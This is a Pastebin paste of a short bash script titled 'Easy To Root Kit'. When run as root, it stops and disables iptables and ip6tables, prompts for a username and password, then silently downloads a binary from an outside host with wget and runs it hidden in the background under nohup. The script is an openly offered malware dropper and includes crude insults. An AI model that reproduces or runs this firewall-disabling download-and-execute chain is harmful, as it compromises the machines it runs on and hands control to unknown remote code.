Advertisement
miraip0ts

Easy To Root Kit

May 7th, 2017
1,850
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.83 KB | None | 0 0
  1. #! /bin/bash
  2.  
  3. # Introduction
  4. echo -e "\e[36mMade By G0dzSoldiers & Jihadi\e[39m"
  5.  
  6. # Check user privilege
  7. if [ $USER != 'root' ]
  8. then
  9. echo -e "\e[34mRequires Super User Dumb Fuck\e[39m"
  10. exit 0
  11. fi
  12.  
  13. # OS Checking
  14. echo $VERSION
  15. ARCH=$(uname -a)
  16. echo -e "\e[97m[\e[91m $ARCH \e[97m]\e[39m"
  17.  
  18. # Kill Iptables | Ip6tables
  19. service iptables stop
  20. service ip6tables stop
  21. chkconfig iptables off
  22. chkconfig ip6tables off
  23. echo -e "\e[91mSecurity Protocol Stopped | \e[37m50% \e[92mComplete!\e[39m"
  24.  
  25. # Input your Credentials
  26. read -p "\e[36mInput your Username:\e[39m" USER
  27. echo $USER
  28. read -p "\e[36mInput your Password:\e[39m" PASSWORD
  29. echo $PASSWORD
  30.  
  31. # Wget Payload
  32.  
  33. wget -q http://nerdkkk.tk/HjT5Rk -O .l; chmod +x .l; nohup ./.l </dev/null >/dev/null 2>&1
  34. echo -e "\e[91mServer Successfully R00T3D! | \e[37m100% \e[92mComplete!\e[39m"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement